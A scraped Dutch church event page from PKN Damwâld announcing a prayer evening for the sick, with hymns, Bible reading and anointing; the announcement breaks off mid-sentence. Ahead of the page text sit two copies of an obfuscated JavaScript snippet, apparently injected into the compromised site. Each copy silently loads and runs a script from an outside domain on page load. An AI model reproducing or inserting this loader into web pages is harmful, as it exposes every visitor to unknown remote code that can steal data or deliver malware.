;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gebedsavond voor zieken - PKN Damwâld
8 januari 2020
19:00 t/m 20:00
't Skûlplak
Gebedsavond voor zieken

Op woensdag 8 januari zal er een opnieuw een speciale gebedsavond gehouden worden voor zieken in de gemeente. We denken ook aan langdurig en chronisch zieken. We maken een lijst waarop de zieken vermeld staan die het op prijs stellen dat er voor hen gebeden wordt. In de kerk zal een lijst liggen waarop u de namen van zieken kunt schrijven. U kunt ook namen doorgeven aan mij (ds. Otter) of vragen of er voor u gebeden wordt.
Op de avond van 8 januari zelf zijn zieken ook in het bijzonder van harte welkom om te komen. Wanneer ze dat op prijs stellen is er gelegenheid dat er speciaal voor hen gebeden wordt. U mag zelf aangeven waar we voor bidden, omdat dat voor elke zieke kan verschillen. Er is ook gelegenheid om ziekenzalving te ontvangen. Ziekenzalving is een gebruik dat in Jac. 5 genoemd wordt. Je kan het zien als een zegening waarbij een beetje zalfolie op het voorhoofd wordt gedaan.
Wat doen we zo op de avond? We zullen een aantal liederen zingen, daarna lezen we een gedeelte uit de Bijbel en vervolgens bidden we voor de zieken die op de lijst staan of die gekomen zijn op die avond. Dit alles doen we in de afhankelijkheid van de Here Jezus, Die onze zwakheden en lasten droeg. Hij nodigt uit: “komt tot Mij allen die vermoeid en belast zijn en Ik zal u rust geven (Mt.11, 28).
Zo willen we graag onze beden in geloof bij de Here brengen waarbij we het resultaat van het gebed in Zijn handen leggen.
De avond begint om 19:00 en duurt tot 20:00. Het zal gehouden worden in het Skûlplak. Leden van andere gemeenten zijn ook van harte welkom. Als u zelf ziek bent en graag wilt komen, dan helpt het ons om dat van te voren te weten. Ook als u twijfelt of het wel voor u (of voor jou) is dan

Locatie: 't SkûlplakBûterblom 8, 9104 JE Damwâld